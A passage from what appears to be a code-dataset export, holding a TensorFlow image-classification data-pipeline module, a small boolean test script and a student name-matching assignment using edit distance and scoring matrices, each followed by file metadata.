self.train_dataset = self.train_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.train_dataset = self.train_dataset.repeat()
self.train_dataset = self.train_dataset.shuffle(1024)
self.train_dataset = self.train_dataset.batch(
batch_size=self.task_params.batch_size)
# self.train_dataset = self.train_dataset.cache()
self.train_dataset = self.train_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
self.valid_dataset = self.databuilder.as_dataset(split="test")
assert isinstance(self.valid_dataset, tf.data.Dataset)
self.valid_dataset = self.valid_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.valid_dataset = self.valid_dataset.repeat()
self.valid_dataset = self.valid_dataset.batch(
batch_size=self.task_params.batch_size)
self.valid_dataset = self.valid_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
class AffNistTask(Task):
def __init__(self, task_params, name='aff_nist',data_dir='data', builder_cls=AffNist):
super(AffNistTask, self).__init__(task_params=task_params, name=name,
data_dir=data_dir,
builder_cls=builder_cls)
def input_shape(self):
"""
To be used when calling model.build(input_shape)
:return:
#[batch_size, height, width, channels
"""
return [None, 32, 32, 1]
def vocab_size(self):
return 40*40
def output_size(self):
return 10
def get_loss_fn(self):
return ClassificationLoss(global_batch_size=self.task_params.batch_size,
padding_symbol=tf.constant(-1, dtype=tf.int64))
def get_distill_loss_fn(self, distill_params):
return DistillLoss(tmp=distill_params.distill_temp)
def get_probs_fn(self):
return get_probs
def metrics(self):
return [ClassificationLoss(global_batch_size=self.task_params.batch_size,
padding_symbol=tf.constant(-1, dtype=tf.int64)),
tf.keras.metrics.SparseCategoricalAccuracy()]
@property
def padded_shapes(self):
# To make sure we are not using this!
raise NotImplementedError
def convert_examples(self, examples):
return tf.cast(examples['image'], dtype=tf.float32)/255, tf.cast(examples['label'], dtype=tf.int32)
def setup_datasets(self):
self.info = self.databuilder.info
self.n_train_batches = int(
self.info.splits['train'].num_examples / self.task_params.batch_size)
self.n_test_batches = int(
self.info.splits['test'].num_examples / self.task_params.batch_size)
self.n_valid_batches = int(
self.info.splits['test'].num_examples / self.task_params.batch_size)
self.test_dataset = self.databuilder.as_dataset(split="test")
assert isinstance(self.test_dataset, tf.data.Dataset)
self.test_dataset = self.test_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.test_dataset = self.test_dataset.repeat()
self.test_dataset = self.test_dataset.batch(
batch_size=self.task_params.batch_size)
self.test_dataset = self.test_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
self.train_dataset = self.databuilder.as_dataset(split="train")
assert isinstance(self.train_dataset, tf.data.Dataset)
self.train_dataset = self.train_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.train_dataset = self.train_dataset.repeat()
self.train_dataset = self.train_dataset.shuffle(1024)
self.train_dataset = self.train_dataset.batch(
batch_size=self.task_params.batch_size)
# self.train_dataset = self.train_dataset.cache()
self.train_dataset = self.train_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
self.valid_dataset = self.databuilder.as_dataset(split="test")
assert isinstance(self.valid_dataset, tf.data.Dataset)
self.valid_dataset = self.valid_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.valid_dataset = self.valid_dataset.repeat()
self.valid_dataset = self.valid_dataset.batch(
batch_size=self.task_params.batch_size)
self.valid_dataset = self.valid_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
class Svhn(Mnist):
def __init__(self, task_params, name='svhn', data_dir='mnist_data'):
self.databuilder = tfds.builder("svhn_cropped")
super(Mnist, self).__init__(task_params=task_params, name=name,
data_dir=data_dir,
builder_cls=None)
def vocab_size(self):
return 32 * 32
def input_shape(self):
"""
To be used when calling model.build(input_shape)
:return:
#[batch_size, height, width, channels
"""
return [None, 32, 32, 1]
class Mnist40(Mnist):
def __init__(self, task_params, name='mnist40', data_dir='mnist_data'):
self.databuilder = tfds.builder("mnist")
super(Mnist, self).__init__(task_params=task_params, name=name,
data_dir=data_dir,
builder_cls=None)
def vocab_size(self):
return 40 * 40
def output_size(self):
return 10
def input_shape(self):
"""
To be used when calling model.build(input_shape)
:return:
#[batch_size, height, width, channels
"""
return [None, 32, 32, 1]
def convert_examples(self, examples):
pad_length = int((40 - 28) / 2)
return tf.pad(tf.cast(examples['image'], dtype=tf.float32) / 255,
([pad_length, pad_length], [pad_length, pad_length],
[0, 0])), tf.cast(
examples['label'], dtype=tf.int32)
| 38.674107 | 103 | 0.683597 | 1,130 | 8,663 | 4.981416 | 0.112389 | 0.078167 | 0.079588 | 0.054006 | 0.927163 | 0.922366 | 0.915971 | 0.889501 | 0.875644 | 0.875644 | 0 | 0.01316 | 0.210551 | 8,663 | 223 | 104 | 38.847534 | 0.809914 | 0.053792 | 0 | 0.84375 | 0 | 0 | 0.019948 | 0 | 0 | 0 | 0 | 0 | 0.0375 | 1 | 0.18125 | false | 0 | 0.0375 | 0.10625 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
2dc707dd567fdfd692f64c153d4c868f69ca1e8d | 171 | py | Python | testing/andandorandnot.py | worldwalker2000/pyxx | 8c6f129042241ca8b0eb274a69ca56b2ac1261cb | [
"MIT"
] | 4 | 2021-12-29T22:44:57.000Z | 2022-01-21T17:27:35.000Z | testing/andandorandnot.py | worldwalker2000/pyxx | 8c6f129042241ca8b0eb274a69ca56b2ac1261cb | [
"MIT"
] | 1 | 2022-03-09T20:56:56.000Z | 2022-03-09T21:57:04.000Z | testing/andandorandnot.py | worldwalker2000/pyxx | 8c6f129042241ca8b0eb274a69ca56b2ac1261cb | [
"MIT"
] | null | null | null | if not not True :
print(True)
else :
print(False)
if True or False :
print(True)
else :
print(False)
if True and True :
print(True)
else :
print(False)
| 8.55 | 18 | 0.625731 | 27 | 171 | 3.962963 | 0.296296 | 0.252336 | 0.364486 | 0.504673 | 0.831776 | 0.831776 | 0.542056 | 0 | 0 | 0 | 0 | 0 | 0.269006 | 171 | 19 | 19 | 9 | 0.856 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
fad033d52c0bfec1b75a37a998fbfe84f93d4e4a | 43,912 | py | Python | COMP90049/summer_pre/COMP90049-Knowledge-Technologies-master 2/Assignment/assignment1/assignment1.py | peiyong-addwater/2019SM1 | 6745cb0a12a751bb445e57dfdd5014c87783faad | [
"MIT"
] | null | null | null | COMP90049/summer_pre/COMP90049-Knowledge-Technologies-master 2/Assignment/assignment1/assignment1.py | peiyong-addwater/2019SM1 | 6745cb0a12a751bb445e57dfdd5014c87783faad | [
"MIT"
] | null | null | null | COMP90049/summer_pre/COMP90049-Knowledge-Technologies-master 2/Assignment/assignment1/assignment1.py | peiyong-addwater/2019SM1 | 6745cb0a12a751bb445e57dfdd5014c87783faad | [
"MIT"
] | null | null | null | '''
Date: 19/3/2017
Author: Ao Li
Work: Comp90049 Knowledge Technologies Assignmen1
Goal: Achive Approximate Matching
'''
import Levenshtein
import nltk
import soundex
import fuzzy
from pip._vendor.html5lib._ihatexml import letter
''' Open the Files:
f1 ---> test.txt: A list of 2K names in the Persian script, without their Latin equivalent
f2 ---> train.txt: A list of 13K names in the Persian script, with their Latin equivalent
f3 ---> names.txt: A list of 26K names in the Latin script (Include all of the Persian names)
'''
f1 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/test.txt')
f2 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/train.txt')
# f2 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/test2Gram1.txt')
f3 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/names.txt')
# f3 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/test2Gram.txt')
# f4 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_global_myself.txt','w+')
# f5 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_local_myself.txt','w+')
# f6 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_global_system.txt','w+')
# f7 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_N-Gram.txt','w+')
# f7 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/test2Gram2.txt','w+')
f8 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_100TrainedLinesMatrix.txt','w+')
# Using Global Edit Distance Method:
''' Set parameters:
# Specified parameters [m,i,d,r] in para as below
m ---> Match
i ---> Insertion
d ---> Deletion
r ---> Replace
'''
# "Normal" Distance:
para1 = [ 1,-1,-1,-1 ]
# Levenshtein Distance:
para2 = [ 0, 1, 1, 1 ]
'''
pNames: represents the list of Persian Names
lNames: represents the list of Latin Names
'''
# pNames = f2.readlines()
# lNames = f3.readlines()
# for pName in pNames:
#
# maxDistance = -10000
# matchName = ""
#
# pName = pName.replace(pName," "+pName)
# index = pName.find('\t')
# pName = pName[0:index]
# pName = pName.lower()
#
# for lName in lNames:
#
# lName = lName.replace(lName," "+lName)
# index = lName.find('\n')
# lName = lName[0:index]
#
# #Initiate the First Row & Column in Distance Array:
# lenP = len( pName )
# lenL = len( lName )
#
# distanceG = [[0 for i in range(lenL) ] for i in range(lenP)]
#
# for i in range(0,lenL):
# distanceG[ 0 ][ i ] = i * para1[ 2 ]
# for i in range(0,lenP):
# distanceG[ i ][ 0 ] = i * para1[ 1 ]
#
# for i in range(1,lenP):
# for j in range(1,lenL):
# if pName[ i ] == lName[ j ]:
# distanceG[ i ][ j ] = max(
# distanceG[ i-1 ][ j-1 ] + para1[0],
# distanceG[ i-1 ][ j ] + para1[1],
# distanceG[ i ][ j-1 ] + para1[2]
# )
# else:
# x = ord( pName[i] )
# y = ord( lName[j] )
# distanceG[ i ][ j ] = max(
# distanceG[ i-1 ][ j-1 ] + ori_blosum62[ x ][ y ],
# distanceG[ i-1 ][ j ] + para1[1],
# distanceG[ i ][ j-1 ] + para1[2]
# )
#
# if distanceG[ lenP-1 ][ lenL-1 ] > maxDistance:
# maxDistance = distanceG[ lenP-1 ][ lenL-1 ]
# matchName = lName
#
# matchName = matchName[1:]
# pName = pName[1:].upper()
# print pName+ "\t" + matchName
# f8.write(pName+ "\t" + matchName + "\n")
# f8.close()
#
# Using Local Edit Distance Method self-wirte (Optional):
# for pName in pNames:
#
# maxDistance = 0
# matchName = ""
#
# pName = pName.replace(pName," "+pName)
# index = pName.find('\t')
# pName = pName[0:index]
# pName = pName.lower()
#
# for lName in lNames:
#
# lName = lName.replace(lName," "+lName)
# index = lName.find('\n')
# lName = lName[0:index]
#
# #Initiate the First Row & Column in Distance Array:
# lenP = len( pName )
# lenL = len( lName )
# maxDistanceTemp = 0
# distanceG = [[0 for i in range(lenL) ] for i in range(lenP)]
#
# for i in range(0,lenL):
# distanceG[ 0 ][ i ] = 0
# for i in range(0,lenP):
# distanceG[ i ][ 0 ] = 0
#
# for i in range(1,lenP):
# for j in range(1,lenL):
# if pName[ i ] == lName[ j ]:
# distanceG[ i ][ j ] = max(
# distanceG[ i-1 ][ j-1 ] + para1[0],
# distanceG[ i-1 ][ j ] + para1[1],
# distanceG[ i ][ j-1 ] + para1[2],
# 0
# )
# else:
# distanceG[ i ][ j ] = max(
# distanceG[ i-1 ][ j-1 ] + para1[3],
# distanceG[ i-1 ][ j ] + para1[1],
# distanceG[ i ][ j-1 ] + para1[2],
# 0
# )
# if distanceG[ i ][ j ] > maxDistanceTemp:
# maxDistanceTemp = distanceG[ i ][ j ]
#
# if maxDistanceTemp > maxDistance:
# maxDistance = maxDistanceTemp
# matchName = lName
#
# matchName = matchName[1:]
# pName = pName[1:].upper()
# print pName,"\t",matchName,"\t",maxDistance
# f5.write(pName+ "\t" + matchName + "\n")
# f5.close()
# Using Global Edit Distance system method (Option)
# for pName in pNames:
# dis = 1000000
# matchName = ''
#
# index = pName.find('\t')
# pName = pName[0:index]
# pName = pName.lower()
# # print pName
# for lName in lNames:
# index = lName.find('\n')
# lName = lName[0:index]
# disTemp = Levenshtein.distance(lName,pName)
# if disTemp < dis:
# dis = disTemp
# matchName = lName
# # print matchName
# f6.write(pName+ "\t" + matchName + "\n")
# f6.close()
# Using N-Gram Method(Optional):
# for pName in pNames:
# index = pName.find('\t')
# pName = pName[0:index]
# pName = pName.lower()
# pName = pName.replace(pName,'#'+pName+'#')
# pName_2gram = list( nltk.bigrams( pName ) )
# gramDistance = 100000
# matchName = ''
# pLen = len(pName_2gram)
#
# for lName in lNames:
# index = lName.find('\n')
# lName = lName[0:index]
# lName = lName.replace(lName,'#'+lName+'#')
# lName_2gram = list( nltk.bigrams( lName ) )
# lLen = len(lName_2gram)
# visit = [0 for i in range( lLen )]
# intersectionTempNum = 0
# for i in range( pLen ):
# for j in range( lLen ):
# if pName_2gram[i] == lName_2gram[j] and visit[j] != 1:
# intersectionTempNum += 1
# visit[ j ] = 1
#
# gramTempDistance = pLen + lLen - 2*intersectionTempNum
# if gramTempDistance < gramDistance:
# gramDistance = gramTempDistance
# matchName = lName
#
# pName = pName[1:len(pName)-1]
# matchName = matchName[1:len(matchName)-1]
# print pName+ "\t" + matchName
# f7.write(pName+ "\t" + matchName + "\n")
# f7.close()
# Using Soundex(Optional):
# soundex = fuzzy.Soundex(4)
# print soundex(a)
# print soundex(b)
# soundex1 = soundex.getInstance()
# print soundex1.soundex(a)
# print soundex1.soundex(b)
# print soundex1.compare(a, b)
# print soundex1.compare(a, c)
# print soundex1.compare(b, c)
# print soundex1.compare(c, a)
# print soundex1.compare(a,d)
''' Using Other Method(Optional):
# Other1: Use improved BLOSUM62 matrix:
Original BLOSUM62 matrix as below:
C S T P A G N D E Q H R K M I L V F Y W
C 9 -1 -1 -3 0 -3 -3 -3 -4 -3 -3 -3 -3 -1 -1 -1 -1 -2 -2 -2
S -1 4 1 -1 1 0 1 0 0 0 -1 -1 0 -1 -2 -2 -2 -2 -2 -3
T -1 1 4 1 -1 1 0 1 0 0 0 -1 0 -1 -2 -2 -2 -2 -2 -3
P -3 -1 1 7 -1 -2 -1 -1 -1 -1 -2 -2 -1 -2 -3 -3 -2 -4 -3 -4
A 0 1 -1 -1 4 0 -1 -2 -1 -1 -2 -1 -1 -1 -1 -1 -2 -2 -2 -3
G -3 0 1 -2 0 6 -2 -1 -2 -2 -2 -2 -2 -3 -4 -4 0 -3 -3 -2
N -3 1 0 -2 -2 0 6 1 0 0 -1 0 0 -2 -3 -3 -3 -3 -2 -4
D -3 0 1 -1 -2 -1 1 6 2 0 -1 -2 -1 -3 -3 -4 -3 -3 -3 -4
E -4 0 0 -1 -1 -2 0 2 5 2 0 0 1 -2 -3 -3 -3 -3 -2 -3
Q -3 0 0 -1 -1 -2 0 0 2 5 0 1 1 0 -3 -2 -2 -3 -1 -2
H -3 -1 0 -2 -2 -2 1 1 0 0 8 0 -1 -2 -3 -3 -2 -1 2 -2
R -3 -1 -1 -2 -1 -2 0 -2 0 1 0 5 2 -1 -3 -2 -3 -3 -2 -3
K -3 0 0 -1 -1 -2 0 -1 1 1 -1 2 5 -1 -3 -2 -3 -3 -2 -3
M -1 -1 -1 -2 -1 -3 -2 -3 -2 0 -2 -1 -1 5 1 2 -2 0 -1 -1
I -1 -2 -2 -3 -1 -4 -3 -3 -3 -3 -3 -3 -3 1 4 2 1 0 -1 -3
L -1 -2 -2 -3 -1 -4 -3 -4 -3 -2 -3 -2 -2 2 2 4 3 0 -1 -2
V -1 -2 -2 -2 0 -3 -3 -3 -2 -2 -3 -3 -2 1 3 1 4 -1 -1 -3
F -2 -2 -2 -4 -2 -3 -3 -3 -3 -3 -1 -3 -3 0 0 0 -1 6 3 1
Y -2 -2 -2 -3 -2 -3 -2 -3 -2 -1 2 -2 -2 -1 -1 -1 -1 3 7 2
W -2 -3 -3 -4 -3 -2 -4 -4 -3 -2 -2 -3 -3 -1 -3 -2 -3 1 2 11
Modified BLOSUM62 matrix as below:
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
A 4 * 0 -2 -1 -2 0 -2 -1 * -1 -1 -1 -1 * -1 -1 -1 1 -1 * -2 -3 * -2 *
B * * * * * * * * * * * * * * * * * * * * * * * * * *
C 0 * 9 -3 -4 -2 -3 -3 -1 * -3 -1 -1 -3 * -3 -3 -3 -1 -1 * -1 -2 * -2 *
D -2 -* -3 6 2 -3 -1 -1 -3 * -1 -4 -3 1 * -1 0 -2 0 1 * -3 -4 * -3 *
E -1 * -4 2 5 -3 -2 0 -3 * 1 -3 -2 0 * -1 2 0 0 0 * -3 -3 * -2 *
F -2 * -2 -3 -3 6 -3 -1 0 * -3 0 0 -3 * -4 -3 -3 -2 -2 * -1 1 * 3 *
G 0 * -3 -1 -2 -3 6 -2 -4 * -2 -4 -3 -2 * -2 -2 -2 0 1 * 0 -2 * -3 *
H -2 * -3 1 0 -1 -2 8 -3 * -1 -3 -2 1 * -2 0 0 -1 0 * -2 -2 * 2 *
I -1 * -1 -3 -3 0 -4 -3 4 * -3 2 1 -3 * -3 -3 -3 -2 -2 * 1 -3 * -1 *
J * * * * * * * * * * * * * * * * * * * * * * * * * *
K -1 * -3 -1 1 -3 -2 -1 -3 * 5 -2 -1 0 * -1 1 2 0 0 * -3 -3 * -2 *
L -1 * -1 -4 -3 0 -4 -3 2 * -2 4 2 -3 * -3 -2 -2 -2 -2 * 3 -2 * -1 *
M -1 * -1 -3 -2 0 -3 -2 1 * -1 2 5 -2 * -2 0 -1 -1 -1 * -2 -1 * -1 *
N -2 * -3 1 0 -3 0 -1 -3 * 0 -3 -2 6 * -2 0 0 1 0 * -3 -4 * -2 *
O * * * * * * * * * * * * * * * * * * * * * * * * * *
P -1 * -3 -1 -1 -4 -2 -2 -3 * -1 -3 -2 -1 * 7 -1 -2 -1 1 * -2 -4 * -3 *
Q -1 * -3 0 2 -3 -2 0 -3 * 1 -2 0 0 * -1 5 1 0 0 * -2 -2 * -1 *
R -1 * -3 -4 0 -3 -2 0 -3 * 2 -2 -1 0 * -2 1 5 -1 -1 * -3 -3 * -2 *
S 1 * -1 0 0 -2 0 -1 -2 * 0 -2 -1 1 * -1 0 -1 4 1 * -2 -3 * -2 *
T -1 * -1 1 0 -2 1 0 -2 * 0 -2 -1 0 * 1 0 -1 1 4 * -2 -3 * -2 *
U * * * * * * * * * * * * * * * * * * * * * * * * * *
V 0 * -1 -3 -2 -1 -3 -3 3 * -2 1 1 -3 * -2 -2 -3 -2 -2 * 4 -3 * -1 *
W -3 * -2 -4 -3 1 -2 -2 -3 * -3 -2 -1 -4 * -4 -2 -3 -3 -3 * -3 11 * 2 *
X * * * * * * * * * * * * * * * * * * * * * * * * * *
Y -2 * -2 -3 -2 3 -3 2 -1 * -2 -1 -1 -2 * -3 -1 -2 -2 -2 * -1 2 * 7 *
Z * * * * * * * * * * * * * * * * * * * * * * * * * *
'''
# Initiate original blosum62 matrix:
ori_blosum62 = [[0 for col in range(26)] for row in range(26)]
ori_blosum62 = [
[ 4, 0, 0,-2,-1,-2, 0,-2,-1, 0,-1,-1,-1,-1, 0,-1,-1,-1, 1,-1, 0,-2,-3, 0,-2, 0 ],
[ 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 9,-3,-4,-2,-3,-3,-1, 0,-3,-1,-1,-3, 0,-3,-3,-3,-1,-1, 0,-1,-2, 0,-2, 0 ],
[-2, 0,-3, 6, 2,-3,-1,-1,-3, 0,-1,-4,-3, 1, 0,-1, 0,-2, 0, 1, 0,-3,-4, 0,-3, 0 ],
[-1, 0,-4, 2, 5,-3,-2, 0,-3, 0, 1,-3,-2, 0, 0,-1, 2, 0, 0, 0, 0,-3,-3, 0,-2, 0 ],
[-2, 0,-2,-3,-3, 6,-3,-1, 0, 0,-3, 0, 0,-3, 0,-4,-3,-3,-2,-2, 0,-1, 1, 0, 3, 0 ],
[ 0, 0,-3,-1,-2,-3, 6,-2,-4, 0,-2,-4,-3,-2, 0,-2,-2,-2, 0, 1, 0, 0,-2, 0,-3, 0 ],
[-2, 0,-3, 1, 0,-1,-2, 8,-3, 0,-1,-3,-2, 1, 0,-2, 0, 0,-1, 0, 0,-2,-2, 0, 2, 0 ],
[-1, 0,-1,-3,-3, 0,-4,-3, 4, 0,-3, 2, 1,-3, 0,-3,-3,-3,-2,-2, 0, 1,-3, 0,-1, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[-1, 0,-3,-1, 1,-3,-2,-1,-3, 0, 5,-2,-1, 0, 0,-1, 1, 2, 0, 0, 0,-3,-3, 0,-2, 0 ],
[-1, 0,-1,-4,-3, 0,-4,-3, 2, 0,-2, 4, 2,-3, 0,-3,-2,-2,-2,-2, 0, 3,-2, 0,-1, 0 ],
[-1, 0,-1,-3,-2, 0,-3,-2, 1, 0,-1, 2, 5,-2, 0,-2, 0,-1,-1,-1, 0,-2,-1, 0,-1, 0 ],
[-2, 0,-3, 1, 0,-3, 0,-1,-3, 0, 0,-3,-2, 6, 0,-2, 0, 0, 1, 0, 0,-3,-4, 0,-2, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[-1, 0,-3,-1,-1,-4,-2,-2,-3, 0,-1,-3,-2,-1, 0, 7,-1,-2,-1, 1, 0,-2,-4, 0,-3, 0 ],
[-1, 0,-3, 0, 2,-3,-2, 0,-3, 0, 1,-2, 0, 0, 0,-1, 5, 1, 0, 0, 0,-2,-2, 0,-1, 0 ],
[-1, 0,-3,-4, 0,-3,-2, 0,-3, 0, 2,-2,-1, 0, 0,-2, 1, 5,-1,-1, 0,-3,-3, 0,-2, 0 ],
[ 1, 0,-1, 0, 0,-2, 0,-1,-2, 0, 0,-2,-1, 1, 0,-1, 0,-1, 4, 1, 0,-2,-3, 0,-2, 0 ],
[-1, 0,-1, 1, 0,-2, 1, 0,-2, 0, 0,-2,-1, 0, 0, 1, 0,-1, 1, 4, 0,-2,-3, 0,-2, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0 ],
[ 0, 0,-1,-3,-2,-1,-3,-3, 3, 0,-2, 1, 1,-3, 0,-2,-2,-3,-2,-2, 0, 4,-3, 0,-1, 0 ],
[-3, 0,-2,-4,-3, 1,-2,-2,-3, 0,-3,-2,-1,-4, 0,-4,-2,-3,-3,-3, 0,-3,11, 0, 2, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0 ],
[-2, 0,-2,-3,-2, 3,-3, 2,-1, 0,-2,-1,-1,-2, 0,-3,-1,-2,-2,-2, 0,-1, 2, 0, 7, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5 ],
]
# Initiate improved matrix1 from 100 lines:
# improvedMatrix_100 = [
# [763, 4, 3, 3, 31, 0, 2, 3, 43, 0, 1, 3, 1, 4, 82, 0, 0, 7, 47, 2, 65, 0, 2, 0, 16, 1 ],
# [ 3, 147, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0 ],
# [ 0, 0, 2, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 226, 4, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 68, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0 ],
# [ 3, 0, 0, 0, 3, 0, 142, 0, 2, 0, 0, 4, 0, 2, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 3, 0, 0, 0, 22, 0, 0, 70, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 5, 0, 7, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 2, 0, 79, 0, 8, 0, 0, 0, 3, 0, 173, 0, 0, 1, 2, 0, 8, 1, 0, 0, 3, 0, 2, 3, 0, 0 ],
# [ 5, 0, 0, 0, 12, 0, 0, 0, 1, 0, 0, 278, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0 ],
# [ 3, 0, 0, 0, 3, 0, 0, 0, 2, 0, 0, 0, 219, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 2, 0, 1, 1, 14, 0, 8, 0, 2, 0, 0, 1, 0, 466, 2, 0, 0, 1, 1, 4, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 1, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 84, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 4, 1, 0, 0, 8, 0, 1, 0, 10, 0, 1, 0, 0, 3, 2, 0, 0, 365, 1, 0, 0, 0, 0, 0, 0, 1 ],
# [ 2, 1, 9, 0, 6, 0, 1, 0, 1, 0, 5, 5, 3, 6, 2, 4, 1, 0, 250, 26, 1, 0, 1, 4, 0, 0 ],
# [ 5, 0, 0, 0, 10, 0, 0, 4, 3, 3, 0, 0, 0, 0, 5, 0, 0, 4, 2, 202, 2, 0, 0, 0, 0, 1 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 6, 2, 0, 1, 16, 2, 0, 0, 2, 0, 0, 6, 4, 2, 310, 1, 2, 8, 3, 2, 134, 49, 60, 2, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
# [ 22, 1, 3, 4, 80, 1, 3, 0, 447, 0, 4, 9, 1, 21, 2, 2, 0, 11, 5, 11, 18, 3, 1, 0, 98, 4 ],
# [ 4, 1, 0, 0, 2, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 0, 0, 44 ]
# ]
# improvedMatrix_100_Modified = [
# [ 26, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 4, 1, 1, 1, 3, 1, 3, 1, 1, 1, 2, 1 ],
# [ 2, 26, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 26, 1, 1, 1, 1, 14, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
# [ 1, 1, 1, 1, 1, 26, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ],
